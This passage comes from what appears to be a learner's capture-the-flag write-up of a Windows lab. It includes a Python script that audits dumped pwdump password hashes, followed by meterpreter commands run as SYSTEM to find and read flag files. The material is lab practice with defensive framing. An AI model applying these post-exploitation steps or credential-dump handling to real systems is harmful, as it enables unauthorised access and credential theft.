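            raise ValueError(f"not a pwdump line: {line!r}")
        user, rid, lm, nt = m.groups()
        accounts.append(Account(user, int(rid), lm.lower(), nt.lower()))
    return accounts


def audit(accounts):
    """Return (user, issue) pairs a defender would act on: blank passwords and legacy LM hashes."""
    issues = []
    for a in accounts:
        if a.blank_password:
            issues.append((a.user, "blank password"))
        if a.lm_stored:
            issues.append((a.user, "LM hash stored (weak legacy hash)"))
    return issues


def shared_password_groups(accounts):
    """Users with identical NT hashes have identical passwords, because NT hashes are unsalted."""
    by_hash = {}
    for a in accounts:
        by_hash.setdefault(a.nt, []).append(a.user)
    return [users for users in by_hash.values() if len(users) > 1]


if __name__ == "__main__":
    accounts = parse_pwdump(SAMPLE_DUMP)
    for user, issue in audit(accounts):
        print(f"{user}: {issue}")
    for group in shared_password_groups(accounts):
        print("same password:", ", ".join(group))
```

On the dump above this reports that Administrator (RID 500) and Guest both have blank passwords and therefore the same password, while Jon's hash is a real one; no account stores an LM hash, which is what you expect from Windows 7 defaults.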
Flag hunting
I just ran dir for a start and flag3 was right there.
Maybe I got the steps out of order somewhere.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > dir
Listing: C:\Users\Jon\Documents
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2018-12-13 12:13:31 +0900 My Music
40777/rwxrwxrwx 0 dir 2018-12-13 12:13:31 +0900 My Pictures
40777/rwxrwxrwx 0 dir 2018-12-13 12:13:31 +0900 My Videos
100666/rw-rw-rw- 402 fil 2018-12-13 12:13:45 +0900 desktop.ini
100666/rw-rw-rw- 37 fil 2018-12-13 12:49:18 +0900 flag3.txt
meterpreter > cat flag3.txt
Finding the other flags
The search command is seriously handy.
meterpreter > search -f flag*.txt
Found 3 results...
c:\flag1.txt (24 bytes)
c:\Users\Jon\Documents\flag3.txt (37 bytes)
c:\Windows\System32\config\flag2.txt (34 bytes)
When cd-ing around is a pain, you can reference the path directly by doubling the backslashes.
meterpreter > cat c:\\flag1.txt
meterpreter > cat c:\\Windows\\System32\\config\\flag2.txt
Done.
There's a lot I only half understand, so I want to keep getting more comfortable with this.